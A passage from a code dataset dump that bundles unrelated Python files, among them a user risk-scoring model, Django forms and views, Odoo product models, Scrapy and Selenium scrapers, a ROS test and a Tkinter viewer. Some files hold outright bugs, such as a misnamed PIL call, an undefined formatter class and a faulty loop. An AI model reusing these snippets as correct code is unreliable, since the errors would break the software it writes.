{}\\nGC%: {}\\nSEQ: {}\\n{}'.format(\n record1.name,\n record1.organism,\n record1.length(),\n record1.gc_content() * 100.0,\n record1.sequence,\n str(record1)\n ))\n print()\n print('ID: {}\\nORG: {}\\nLEN: {}\\nGC%: {}\\nSEQ: {}\\n{}'.format(\n record2.name,\n record2.organism,\n record2.length(),\n record2.gc_content() * 100.0,\n record2.sequence,\n str(record2)\n ))\n\n print(\"record1 == record1:\")\n print(record1 == record1)\n print(\"record1 == record2:\")\n print(record1 == record2)\n\n","sub_path":"problemsets/answers/Python_11_JVB_ChallengeQuestion.py","file_name":"Python_11_JVB_ChallengeQuestion.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339315940","text":"import ah_datadog\nimport ah_db\nimport csv\nimport os\nimport traceback\nfrom modeling.feature.feature_activation import ActivationFeature\nfrom modeling.feature.feature_bank import BankFeature_predict, BankFeature\nfrom modeling.feature.feature_payroll import Payroll\nfrom modeling.feature.feature_device import DeviceFeature\nfrom modeling.feature.feature_user import UserFeature\nfrom modeling.feature.feature_employment import EmploymentFeature\nfrom modeling.feature.feature_cs import CSFeature\nfrom datetime import datetime\nfrom modeling.feature.feature_generator import FeatureGenerator\nfrom modeling.feature.feature_timesheet import TimeSheetFeature\nfrom modeling.feature.feature_new import NewFeature\n\n\nimport pickle\nimport pandas as pd\nimport modeling.misc.data_preparation as dp\nimport numpy as np\n\n\nclass NewUserRiskModel:\n def __init__(self):\n self.dummyVar = []\n self.pkl_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"newuser_lr.pkl\")\n\n def createDerivedFeature(self, fg):\n\n self.dummyVar = ['derived_employerid', 'cs_lastAudit1Username',\n 'cs_lastAuditSource', 'cs_lastAuditType',\n 'cs_lastAuditUsername', 'device_lastInstallOS',\n 'payroll_lastPayrollSetupBy',\n 'payroll_paycycleFrequencyId', 'payroll_paytypeid']\n\n fg.f['derived_employerid'] = fg.f['employment_employer']\n\n if fg.f['payroll_hourlyRate'] > 20:\n fg.f['derived_hourlyRateGT20'] = 1\n else:\n fg.f['derived_hourlyRateGT20'] = 0\n\n if fg.f['payroll_lastPayrollStatus'] != 11:\n fg.f['derived_lastPayrollStatus11'] = 0\n else:\n fg.f['derived_lastPayrollStatus11'] = 1\n\n if fg.f['cs_nCredit'] > 0:\n fg.f['derived_hasCSCredit'] = 1\n else:\n fg.f['derived_hasCSCredit'] = 0\n\n if fg.f['employment_nEmployer'] > 5:\n fg.f['derived_nEmployerGT5'] = 1\n else:\n fg.f['derived_nEmployerGT5'] = 0\n\n def getPredTimeTarget(self):\n with ah_db.open_db_connection('sqlserver') as connection:\n sql = '''\n select u.userid, max(predtime) as predtime,sum(IsRestoreFailureAch) as isFail90d, sum(IsLossUpperBound) as isLoss90d,sum(amount) as amount,sum(tipamount) as tipamount,sum(IsLossUpperBound*amount) as totallossamt, max(isFail) as isFail, max(u.isLoss) as isLoss, max(userstatuschangereasonid) as userstatuschangereasonid, max(updatedby) as updatedby, max(originalstatusid) as originalstatusid, max(contributionmargin) as contributionmargin, max(amt_tot) as amt_tot, max(loss_tot) as loss_tot\n from\n (select u.userid,case when MinActivationdate< cast(a.createdon as date) then cast(MinActivationdate as datetime) else a.createdon end as predtime, case when restorefailureamount>0 then 1 else 0 end as isFail, case when restorefailureamount>0 and restorefailureamount>recoveredamount+1 then 1 else 0 end as isLoss,contributionmargin,a.userstatuschangereasonid, a.updatedby,a.originalstatusid,newstatusid,u.amount as amt_tot, u.restorefailureamount-recoveredamount as loss_tot\n from (select userid,userstatuschangereasonid, updatedby,createdon,originalstatusid,newstatusid\n from (select *,rank() over (Partition by userid order by createdon) ranks\n from [Users].[UserStatusHistory]\n where NewStatusId=4 or newstatusid=8) a\n where ranks=1) a\n left join analysis.users u on u.UserID=a.userid\n where u.signupdate>='2016-09-01'\n ) u\n left join analysis.activations ac on u.userid=ac.userid and predtime> dateadd(dd,-90,ac.RequestDate) and iserror=0 and IsCancelled=0 and ac.restoredate 0:\n target = r[0]\n else:\n target = {'userstatuschangereasonid': 'NaN',\n 'updatedby': 'NaN',\n 'originalstatusid': 'NaN'}\n\n f['userstatuschangereasonid'] = target['userstatuschangereasonid']\n f['updatedby'] = target['updatedby']\n f['originalstatusid'] = target['originalstatusid']\n\n def createMaster(self, fout, targets):\n writer = None\n n = 1\n print(\"Start creating master data\")\n print(\"Total number of user %d\" % len(targets))\n for target in targets:\n uid=int(target['userid'])\n if n % 1000 == 0:\n print(n)\n n += 1\n # activation = ActivationFeature(self.conn, uid,scoring=False)\n while True:\n try:\n bank = BankFeature(uid)\n payroll = Payroll(uid)\n device = DeviceFeature(uid)\n user = UserFeature(uid)\n employment = EmploymentFeature(uid)\n cs = CSFeature(uid)\n # pip = PIPFeature(self.conn, uid)\n timesheet = TimeSheetFeature(uid)\n new = NewFeature(uid)\n\n predTime = target['predtime']\n break\n except:\n traceback.print_exc()\n\n if predTime > datetime(2016, 9, 1):\n fg = FeatureGenerator(uid, predTime)\n\n self.getMiscFeature(fg.f, target)\n # fg.feature_generator(activation)\n fg.feature_generator(bank)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n\n self.createDerivedFeature(fg)\n if writer is None:\n fieldnames = sorted(list(fg.f.keys()))\n writer = csv.DictWriter(fout, fieldnames=fieldnames)\n\n writer.writeheader()\n\n fg.printFeatures(writer)\n\n @ah_datadog.datadog_timed(name=\"getAllFeatures\", tags=[\"operation:newUserRisk\"])\n def getAllFeatures(self, uid):\n # print(\"Start calculating features for %d\"%uid)\n activation = ActivationFeature(uid)\n bank = BankFeature_predict(uid)\n payroll = Payroll(uid)\n device = DeviceFeature(uid)\n user = UserFeature(uid)\n employment = EmploymentFeature(uid)\n cs = CSFeature(uid)\n # pip = PIPFeature(self.conn, uid)\n timesheet = TimeSheetFeature(uid)\n\n new = NewFeature(uid)\n\n predTime = datetime.utcnow() #+timedelta(hours=-4) datetime.now(eastern)\n fg = FeatureGenerator(uid, predTime)\n self.getMiscFeaturePredict(fg.f, uid)\n\n fg.feature_generator(activation)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n fg.feature_generator(bank)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n\n self.createDerivedFeature(fg)\n return fg\n\n def __loadModel__(self):\n filename = open('./modeling/model/risk_model/newuser_risk_model'\n '/model/logisticRegression.pkl', 'rb')\n dummy_rules = pickle.load(filename)\n normalizer = pickle.load(filename)\n lr = pickle.load(filename)\n f_columns = pickle.load(filename)\n return dummy_rules, normalizer, lr, f_columns\n\n def getPredictionData(self, features):\n dummy_rules, normalizer, lr, f_columns = self.__loadModel__()\n df = pd.DataFrame(features, index=[0])\n df.replace(['True', 'False'], [1, 0], inplace=True)\n\n cats = ['employment_paytypeid', 'payroll_paycycleFrequencyId',\n 'bank_getInstitutionId',\n 'cs_lastAuditUsername', 'cs_lastAudit1Username', 'user_domain',\n 'payroll_lastPayrollSetupBy', 'device_lastInstallOS',\n 'employment_employer',\n 'actDayOfWeek']\n\n df = dp.dummyCoding(df, cats, dummy_rules)\n\n ##################\n df['derived_transactionAmountTrendDisToOne'] = \\\n np.abs(df['bank_transactionAmountTrend'] - 1)\n\n df['derived_transactionCountTrendDisToOne'] = \\\n np.abs(df['bank_transactionCountTrend'] - 1)\n ###############\n\n X_predict = dp.dataNormalization_Predict(\n df[f_columns],\n normalizer)\n return X_predict, lr\n\n def getReasonCode(self, X_predict, predictor):\n rc = X_predict.values*predictor.coef_\n rc = rc[0]\n\n f_columns = X_predict.columns.tolist()\n reasonCodes = [(x, y) for (y, x) in\n sorted(zip(rc, f_columns), reverse=True)]\n reasonCode = [\"%s:%.2f\" % x for x in reasonCodes[:5]]\n return reasonCode\n\n def getReasonCodeForNegativeOne(self, X_predict):\n reasons = X_predict.isnull().any(axis=0)\n reasonCode = reasons[reasons == True].index.tolist()\n return reasonCode\n\n def getScore(self, X_predict, predictor):\n\n y_pred = predictor.predict_proba(X_predict)\n# y_pred = lr.predict_proba(X_predict)\n\n r = y_pred[0, -1]\n\n return r\n\n\ndef prepareTrainingData(uids):\n filepath = './modeling/model/newuser/data/'\n filename = 'master_%d.csv'%os.getpid()\n\n while True:\n try:\n fout = open(filepath+filename, 'w', encoding='utf-8')\n break\n except IOError:\n os.mkdir(filepath)\n\n model = NewUserRiskModel()\n\n # # print (fg.f)\n\n model.createMaster(fout,uids)\n\n fout.close()\n\n\nif __name__ == \"__main__\":\n model = NewUserRiskModel()\n\n \"\"\"\n filepath = './modeling/model/risk_model/newuser_risk_model/data/'\n cmd = 'rm -f ' + filepath + 'master*.csv'\n os.system(cmd)\n conn = connect_db(30)\n model = NewUserRiskModel(conn)\n targets = model.getPredTimeTarget()\n print(len(targets))\n # print(uids[0])\n# prepareTrainingData(targets)\n from numpy import *\n nprocess=8\n targets=[ [targets[i] for i in range(len(targets)) if i%nprocess==x] for x in range(nprocess)]\n for i in targets: print(len(i))\n pool = Pool(processes=nprocess)\n pool.map(prepareTrainingData, targets)\n \"\"\"\n","sub_path":"src/modeling/model/newuser/NewUserRiskModel.py","file_name":"NewUserRiskModel.py","file_ext":"py","file_size_in_byte":11569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"193135790","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .settings import CONTENTO_RENDERERS\nfrom contento import renderers\nfrom django.utils.module_loading import import_string\n\nclass RenderersMetaView(APIView):\n\n def get_contento_renderers(self):\n\n if CONTENTO_RENDERERS is None:\n RENDERERS = []\n for x in dir(renderers):\n o = getattr(renderers, x);\n try:\n sub = issubclass(o, renderers.base.BaseRenderer)\n except:\n continue\n if sub:\n RENDERERS.append(\"contento.renderers.%s\" % x)\n return RENDERERS\n\n return CONTENTO_RENDERERS or []\n\n def get(self, request, *args, **kwargs):\n rs = self.get_contento_renderers()\n out = {}\n for r in rs:\n klass = import_string(r)\n json_schema = getattr(klass, \"json_schema\")\n if json_schema:\n out[r] = json_schema\n\n return Response(out)\n","sub_path":"contento/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256713160","text":"import scrapy\nimport uuid\nimport re\nfrom datetime import datetime\n\n\nclass MovieItem(scrapy.Item):\n id = scrapy.Field()\n url = scrapy.Field()\n timestamp_crawl = scrapy.Field()\n title = scrapy.Field()\n release_date = scrapy.Field()\n budget = scrapy.Field()\n gross_usa = scrapy.Field()\n runtime = scrapy.Field()\n\nclass IMDBSpider(scrapy.Spider):\n name = \"title\"\n base_url = 'https://www.imdb.com'\n handle_httpstatus_list = [301] # deal with non / in extracted ending\n download_delay = 1.0\n count = 0\n\n custom_settings = {\n 'FEED_URI': 'title.jl',\n 'FEED_FORMAT': 'jsonlines',\n 'FEED_EXPORTERS': {\n 'json': 'scrapy.exporters.JsonLinesItemExporter',\n },\n 'FEED_EXPORT_ENCODING': 'utf-8',\n }\n\n def start_requests(self):\n urls = [\n 'https://www.imdb.com/search/title/?genres=sci-fi&view=simple&sort=num_votes,desc&explore=title_type,genres',\n # 'https://www.imdb.com/search/title/?genres=sci-fi&view=simple&sort=num_votes,desc&start=3509&explore=title_type,genres&ref_=adv_nxt'\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse_page(self, response):\n item = MovieItem(id=str(uuid.uuid4()), url='', timestamp_crawl='', title='', release_date='', budget='', gross_usa='',\n runtime='')\n item['url'] = response.url\n item['timestamp_crawl'] = datetime.now().isoformat(timespec='minutes')\n item['title'] = response.css('div.title_wrapper h1::text').get().strip()\n texts = response.css('div#titleDetails.article div.txt-block')\n for text in texts:\n t = text.css(\"h4::text\").get()\n if t == 'Release Date:':\n d = \"\".join(text.css(\"div::text\").getall()).strip()\n date_regex = r'([0-9]{0,2} )?[a-zA-z]* [0-9]{4}' # matching example: '19 January 2010' or 'December 2009'\n match = re.match(date_regex, d)\n if match is not None:\n item['release_date'] = d[match.start(): match.end()] if match is not None else ''\n elif t == 'Budget:':\n item['budget'] = \"\".join(text.css(\"div::text\").getall()).strip()\n elif t == 'Gross USA:':\n item['gross_usa'] = \"\".join(text.css(\"div::text\").getall()).strip()\n elif t == 'Runtime:':\n rt = \"\".join(text.css(\"div time::text\").getall()).strip()\n match = re.match(r'[0-9]* min', rt)\n if match is not None:\n item['runtime'] = rt[match.start():match.end()]\n yield item\n\n def parse(self, response):\n self.count += 1\n\n for span in response.css('span.lister-item-header'):\n\n links = span.css('a::attr(href)').getall()\n if len(links) == 2:\n # We should go to episode page instead of the movie page\n yield response.follow(links[1], callback=self.parse_page)\n else:\n yield response.follow(links[0], callback=self.parse_page)\n\n next_page = response.css('div.desc a.lister-page-next::attr(href)').get()\n if next_page is not None and self.count < 100:\n yield response.follow(next_page, callback=self.parse)\n","sub_path":"imdb/imdb/spiders/imdb_scifi_spider.py","file_name":"imdb_scifi_spider.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"165485020","text":"def Cmn(np,nq,nr):\n if np==0 and nr==0 and nr==0:\n return 0\n elif abs(np-nq)>1 or abs(np-nr)>1 or abs(nq-nr)>1:\n return 0\n lista=[np//3,nq//3,nr//3]\n min3=min(lista)\n count=0\n if abs(np-nq)<=1 or abs(np-nr)<=1 or abs(nq-nr)<=1:\n if (np-3*min3)>=0 and (nq-3*min3)>=0 and (nr-3*min3)>=0:\n count+=6*2\n np=np-3*min3\n nq=nq-3*min3\n nr=nr-3*min3\n while not min3:\n if abs(np-nq)<=1 or abs(np-nr)<=1 or abs(nq-nr)<=1:\n count+=2\n return count\nprint(Cmn(2,1,1))","sub_path":"2017-5/znewfile/4232gd.py","file_name":"4232gd.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"433128454","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing tailsde.\nfrom odoo import models,fields,api,exceptions\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools.translate import _\nimport os\nimport qrcode\nfrom PIL import Image\nfrom odoo.modules.module import get_module_resource\nfrom odoo.addons.wx_tools.controllers import client\nimport requests\n\nclass ProductPublicCategory(models.Model):\n _name = 'product.public.category'\n _inherit = 'product.public.category'\n\n\n def _compute_sz_show(self):\n for s in self:\n sz_show = False\n if s.parent_id:\n company_id = self.env['res.company'].search([('company_code','=','2000')]).id\n product = self.env['product.template']\n\n products = product.search([('public_categ_ids','in',s.id)])\n if products:\n for p in products:\n for pc in p.pc_show_id:\n if pc.company_id.id == company_id and pc.show_ok:\n sz_show = True\n break\n if sz_show:\n break\n else:\n categs = self.search([('parent_id','=',s.id)])\n for c in categs:\n if c.sz_show == True:\n sz_show = True\n break\n s.sz_show = sz_show\n\n def _compute_bj_show(self):\n\n for s in self:\n bj_show = False\n if s.parent_id:\n company_id = self.env['res.company'].search([('company_code','=','1000')]).id\n product = self.env['product.template']\n\n products = product.search([('public_categ_ids','in',s.id)])\n if products:\n for p in products:\n for pc in p.pc_show_id:\n if pc.company_id.id == company_id and pc.show_ok:\n bj_show = True\n break\n if bj_show:\n break\n else:\n categs = self.search([('parent_id','=',s.id)])\n for c in categs:\n if c.bj_show == True:\n bj_show = True\n break\n s.bj_show = bj_show\n\n code = fields.Char('代码')\n sz_show = fields.Boolean('深圳公司显示',compute=_compute_sz_show)\n bj_show = fields.Boolean('北京公司显示',compute=_compute_bj_show)\n\n qrcode = fields.Char(u'二维码')\n qrcodeimg = fields.Html(compute='_get_qrcodeimg', string=u'二维码')\n\n def _get_qrcodeimg(self):\n entry = client.wxenv(self.env)\n if not self.qrcode:\n wx_file_path = get_module_resource('wx_tools', 'static/wx')\n file_name = 'product_category%s.png' % self.id\n url = entry.server_url + \"/hhjc_shop_product_list_page/%s\" % self.id\n qr = qrcode.QRCode(\n version=5,\n error_correction=qrcode.constants.ERROR_CORRECT_H,\n box_size=5,\n border=4,\n )\n qr.add_data(url)\n qr.make(fit=True)\n # 生成图片\n img = qr.make_image(fill_color=\"#FFFFFF\", back_color=\"#000000\")\n qrcodeimg_pic = os.path.join(wx_file_path, file_name)\n with open(qrcodeimg_pic, 'wb') as product_file:\n img.save(product_file)\n self.write({'qrcode': file_name})\n self.qrcodeimg = '' % file_name\n\n else:\n self.qrcodeimg = '' % self.qrcode\n\n\n\nclass ProductTemplate(models.Model):\n _name = 'product.template'\n _inherit = 'product.template'\n\n @api.model\n def create(self, vals):\n if vals.get('pos_public_categ_ids', False):\n public_categ_ids = [(6, 0, [vals.get('pos_public_categ_ids')])]\n vals['public_categ_ids'] = public_categ_ids\n del vals['pos_public_categ_ids']\n return super(ProductTemplate, self).create(vals)\n\n @api.multi\n def write(self, vals):\n if vals.get('pos_public_categ_ids', False):\n public_categ_ids = [(6, 0, [vals.get('pos_public_categ_ids')])]\n vals['public_categ_ids'] = public_categ_ids\n del vals['pos_public_categ_ids']\n return super(ProductTemplate, self).write(vals)\n","sub_path":"e2yun_addons/odoo12/e2yun_hhjc_website_sale_extends/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"210826588","text":"from crispy_forms.helper import FormHelper\nfrom crispy_forms_foundation.layout import (\n ButtonHolder,\n Column,\n Fieldset,\n Layout,\n Row,\n Submit,\n)\nfrom dal import autocomplete\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.forms import RadioSelect\n\nfrom . import const\nfrom .models.uczelnia import RaportSlotowUczelnia\n\nfrom bpp.const import PBN_MAX_ROK, PBN_MIN_ROK\nfrom bpp.models import Autor, Uczelnia\nfrom bpp.util import formdefaults_html_after, formdefaults_html_before, year_last_month\n\nOUTPUT_FORMATS = [\n (\"html\", \"wyświetl w przeglądarce\"),\n (\"xlsx\", \"Microsoft Excel (XLSX)\"),\n]\n\nOUTPUT_FORMATS_WITH_PDF = OUTPUT_FORMATS + [\n (\"pdf\", \"Portable Document Format (PDF)\"),\n]\n\n\nclass AutorRaportSlotowForm(forms.Form):\n obiekt = forms.ModelChoiceField(\n label=\"Autor\",\n queryset=Autor.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:public-autor-autocomplete\"),\n )\n\n od_roku = forms.IntegerField(initial=year_last_month, min_value=2016)\n do_roku = forms.IntegerField(initial=Uczelnia.objects.do_roku_default)\n\n minimalny_pk = forms.IntegerField(label=\"Minimalna wartość PK pracy\", initial=0)\n\n dzialanie = forms.ChoiceField(\n label=\"Wygeneruj\",\n choices=(\n (\n const.DZIALANIE_WSZYSTKO,\n \"prace autora z punktacją dla dyscyplin za dany okres\",\n ),\n (const.DZIALANIE_SLOT, \"zbierz najlepsze prace do zadanej wielkości slotu\"),\n ),\n initial=\"wszystko\",\n widget=forms.RadioSelect,\n )\n\n slot = forms.DecimalField(\n label=\"Zadana wielkość slotu\",\n required=False,\n max_digits=8,\n decimal_places=4,\n max_value=20,\n )\n\n _export = forms.ChoiceField(\n label=\"Format wyjściowy\", choices=OUTPUT_FORMATS_WITH_PDF, required=True\n )\n\n def clean(self):\n if \"od_roku\" in self.cleaned_data and \"do_roku\" in self.cleaned_data:\n if self.cleaned_data[\"od_roku\"] > self.cleaned_data[\"do_roku\"]:\n raise ValidationError(\n {\n \"od_roku\": ValidationError(\n 'Pole musi być większe lub równe jak pole \"Do roku\".',\n code=\"od_do_zle\",\n )\n }\n )\n\n if (\n self.cleaned_data[\"dzialanie\"] == const.DZIALANIE_WSZYSTKO\n and \"slot\" in self.cleaned_data\n and self.cleaned_data[\"slot\"] is not None\n ):\n raise ValidationError(\n {\n \"slot\": ValidationError(\n \"Gdy chcesz wygenerować wszystkie prace tego autora, pozostaw pole 'Slot' puste. \",\n code=\"nie_podawaj_gdy_wszystko\",\n )\n }\n )\n\n if self.cleaned_data[\"dzialanie\"] == const.DZIALANIE_SLOT and (\n \"slot\" not in self.cleaned_data\n or (\"slot\" in self.cleaned_data and self.cleaned_data[\"slot\"] is None)\n or (\n \"slot\" in self.cleaned_data\n and self.cleaned_data[\"slot\"] is not None\n and self.cleaned_data[\"slot\"] <= 0\n )\n ):\n raise ValidationError(\n {\n \"slot\": ValidationError(\n \"Podaj wartość slota do którego chcesz zbierać prace. Wartość musi być większa od zera. \",\n code=\"podawaj_gdy_slot\",\n )\n }\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.helper = FormHelper()\n self.helper.form_class = \"custom\"\n self.helper.form_action = \".\"\n self.helper.layout = Layout(\n Fieldset(\n \"Wybierz parametry\",\n formdefaults_html_before(self),\n Row(Column(\"obiekt\", css_class=\"large-12 small-12\")),\n Row(Column(\"dzialanie\", css_class=\"large-12 small-12\")),\n Row(Column(\"slot\", css_class=\"large-12 small-12\")),\n Row(\n Column(\"od_roku\", css_class=\"large-6 small-6\"),\n Column(\"do_roku\", css_class=\"large-6 small-6\"),\n ),\n Row(Column(\"minimalny_pk\")),\n Row(Column(\"_export\")),\n formdefaults_html_after(self),\n ),\n ButtonHolder(\n Submit(\n \"submit\",\n \"Pobierz raport\",\n css_id=\"id_submit\",\n css_class=\"submit button\",\n ),\n ),\n )\n\n\nclass UtworzRaportSlotowUczelniaForm(forms.ModelForm):\n class Meta:\n model = RaportSlotowUczelnia\n fields = [\n \"od_roku\",\n \"do_roku\",\n \"akcja\",\n \"slot\",\n \"minimalny_pk\",\n \"dziel_na_jednostki_i_wydzialy\",\n \"pokazuj_zerowych\",\n ]\n\n def __init__(self, *args, **kwargs):\n self.helper = FormHelper()\n self.helper.form_class = \"custom\"\n self.helper.form_action = \".\"\n self.helper.layout = Layout(\n Fieldset(\n \"Wybierz parametry\",\n formdefaults_html_before(self),\n Row(\n Column(\"od_roku\", css_class=\"large-6 small-6\"),\n Column(\"do_roku\", css_class=\"large-6 small-6\"),\n ),\n Row(Column(\"akcja\", css_class=\"large-12 small-12\")),\n Row(Column(\"slot\", css_class=\"large-12 small-12\")),\n Row(Column(\"minimalny_pk\", css_class=\"large-12 small-12\")),\n Row(Column(\"dziel_na_jednostki_i_wydzialy\")),\n Row(Column(\"pokazuj_zerowych\")),\n formdefaults_html_after(self),\n ),\n ButtonHolder(\n Submit(\n \"submit\",\n \"Utwórz raport\",\n css_id=\"id_submit\",\n css_class=\"submit button\",\n ),\n ),\n )\n\n super().__init__(*args, **kwargs)\n\n\nclass ParametryRaportSlotowEwaluacjaForm(forms.Form):\n od_roku = forms.IntegerField(\n initial=Uczelnia.objects.do_roku_default, min_value=PBN_MIN_ROK\n )\n do_roku = forms.IntegerField(\n initial=Uczelnia.objects.do_roku_default,\n min_value=PBN_MIN_ROK,\n max_value=PBN_MAX_ROK,\n )\n\n _export = forms.ChoiceField(\n label=\"Format wyjściowy\",\n choices=OUTPUT_FORMATS,\n required=True,\n widget=RadioSelect,\n initial=\"html\",\n )\n upowaznienie_pbn = forms.NullBooleanField(\n required=False,\n # widget=RadioSelect,\n )\n\n def clean(self):\n if \"od_roku\" in self.cleaned_data and \"do_roku\" in self.cleaned_data:\n if self.cleaned_data[\"od_roku\"] > self.cleaned_data[\"do_roku\"]:\n raise ValidationError(\n {\n \"od_roku\": ValidationError(\n 'Pole musi być większe lub równe jak pole \"Do roku\".',\n code=\"od_do_zle\",\n )\n }\n )\n\n def __init__(self, *args, **kwargs):\n self.helper = FormHelper()\n self.helper.form_class = \"custom\"\n self.helper.form_action = \".\"\n self.helper.layout = Layout(\n Fieldset(\n \"Wybierz parametry\",\n formdefaults_html_before(self),\n Row(\n Column(\"od_roku\", css_class=\"large-6 small-6\"),\n Column(\"do_roku\", css_class=\"large-6 small-6\"),\n ),\n Row(Column(\"upowaznienie_pbn\", css_class=\"large-12 small-12\")),\n Row(Column(\"_export\")),\n formdefaults_html_after(self),\n ),\n ButtonHolder(\n Submit(\n \"submit\",\n \"Pobierz raport\",\n css_id=\"id_submit\",\n css_class=\"submit button\",\n ),\n ),\n )\n\n super().__init__(*args, **kwargs)\n","sub_path":"src/raport_slotow/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30287634","text":"#!/usr/bin/python\nimport unittest\nimport yaml\nfrom subprocess import call\n\nimport rospy\nimport rostest\nimport rostopic\nfrom atf_recorder import RecordingManager\n\n\nclass AtfApp:\n def __init__(self):\n self.recorder = RecordingManager('testblock_name')\n\n def execute(self):\n # Example for recorder usage\n self.recorder.start()\n self.recorder.error()\n self.recorder.stop()\n\n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.app = AtfApp()\n\n robot_config = self.load_data(rospy.get_param('/robot_config'))\n self.topics = robot_config['wait_for_topics']\n self.services = robot_config['wait_for_services']\n\n def tearDown(self):\n call(\"killall gzclient\", shell=True)\n call(\"killall gzserver\", shell=True)\n\n def test_Recording(self):\n # Wait for topics and services\n for topic in self.topics:\n rospy.wait_for_message(topic, rostopic.get_topic_class(topic, blocking=True)[0], timeout=None)\n\n for service in self.services:\n rospy.wait_for_service(service, timeout=None)\n\n self.app.execute()\n\n @staticmethod\n def load_data(filename):\n rospy.loginfo(\"Reading data from yaml file...\")\n\n with open(filename, 'r') as stream:\n doc = yaml.load(stream)\n\n return doc\n\n\nif __name__ == '__main__':\n rospy.init_node('test_name')\n rostest.rosrun('atf_app', 'test_name', Test, sysargs=None)\n","sub_path":"atf_app_template/scripts/atf_app.py","file_name":"atf_app.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"405939497","text":"#!/usr/bin/env python3\nimport os\n\nclass TargetList:\n zsh = ['zshrc']\n vim = ['vim', 'vimrc', 'gvimrc']\n X = ['mlterm', 'wmii', 'xsession', 'Xresources']\n\n\ndef make_symlink(fname):\n \"\"\" \"\"\"\n src = os.getcwd() + '/' + fname\n dst = os.environ['HOME'] + '/.' + fname\n try:\n os.remove(dst)\n except FileNotFoundError:\n pass\n print(src, '->', dst)\n os.symlink(src, dst)\n\n\nif __name__ == '__main__':\n import sys\n target_list = TargetList()\n tl = []\n for target in sys.argv[1:]:\n tl += getattr(target_list, target)\n for target in tl:\n make_symlink(target)\n","sub_path":".Makefile.py","file_name":".Makefile.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374387223","text":"\"\"\"Provides methods for creating a GUI with Tkinter\"\"\"\nimport tkinter as tk\nfrom PIL import Image, ImageTk\n\nclass Gui:\n def __init__(self, title=\"New Window\"):\n self.root = tk.Tk()\n self.root.title(title)\n\n def size(self, width, height, offsetx=0, offsety=0):\n self.root.geometry(\"{}x{}+{}+{}\".format(width, height,\n offsetx, offsety))\n\n def run(self):\n self.root.mainloop()\n\n def showimage(self, imageurl, _offsetx=0, _offsety=0, resize=True):\n imagetk = ImageTk.PhotoImage(Image.Open(imageurl))\n\n width = imagetk.width()\n height = imagetk.height()\n offsetx = _offsetx\n offsety = _offsety\n\n if resize: self.size(width, height, offsetx, offsety)\n\n imagepanel = tk.Label(self.root, image=imagetk)\n imagepanel.pack(side='top', fill='both', expand='yes')\n\n imagepanel.image = imagetk\n","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"590667400","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport time\n\ndriver = webdriver.PhantomJS(executable_path=r'D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # 构建无头浏览器,用来解析 Js 加载内容\n\ndriver.get('https://www.shanbay.com/read/news/')\n\ntime.sleep(5) # 显式延时5秒,等待页面完全加载\n\ntry:\n load_more_btn = driver.find_element_by_class_name('loadNewsBtn') #\"加载更多\"按钮\n load_more_btn.click() #点击这个按钮\nexcept:\n print('error')\nsoup = BeautifulSoup(driver.page_source,'html.parser')\n# print(driver.page_source)\ntags = soup.find_all('a',attrs={'class':'linkContainer'})\ntime.sleep(5)\nfor i in tags:\n print(i.attrs['href'])\n\n","sub_path":".idea/技巧-Selenium配合PhantonJS解析js数据.py","file_name":"技巧-Selenium配合PhantonJS解析js数据.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"173623401","text":"import string\nimport os\nimport sys\n\nclass PartitionFormatter(string.Formatter):\n def format_field(self, value, spec):\n if spec.startswith('repeat'):\n template = spec.partition(':')[-1]\n if type(value) is dict:\n value = value.items()\n return ''.join([template.format(partitionId=item) for item in value])\n else:\n return super(SuperFormatter, self).format_field(value, spec)\n\ncurrent_dir = os.path.dirname(os.path.abspath(__file__))\ntemplate_file_name = os.path.join(current_dir, './ats-search-index.template.yaml')\noutput_file_name = os.path.join(current_dir, './ats-search-index.generated.yaml')\n\nnum_partitions = int(sys.argv[1])\npartitions = range(1, num_partitions + 1)\n\npartition_formatter = PartitionFormatter()\nwith open(template_file_name, 'r') as template_file:\n template = 